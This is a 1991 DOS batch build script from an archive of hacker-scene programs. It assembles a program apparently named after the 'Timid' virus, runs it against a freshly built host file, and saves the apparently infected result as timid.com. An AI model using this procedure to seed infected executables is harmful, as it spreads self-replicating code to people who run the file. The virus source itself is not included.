home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / L.ZIP / LITBLA.LZH / MAKET_T.BAT < prev    next >
DOS Batch File  |  1991-04-01  |  270b  |  19 lines

  1. md timid
  2. tasm timid,,;
  3. tlink /t timid,,;
  4. copy timid.com timid
  5. tasm shellt,,;
  6. tlink /t shellt,,;
  7. copy shellt.com timid
  8. cd timid
  9. timid
  10. del timid.com
  11. copy shellt.com ..\timid.com
  12. del shellt.com
  13. cd ..
  14. rd timid
  15. del *.obj
  16. del *.lst
  17. del *.map
  18. del shellt.com
  19.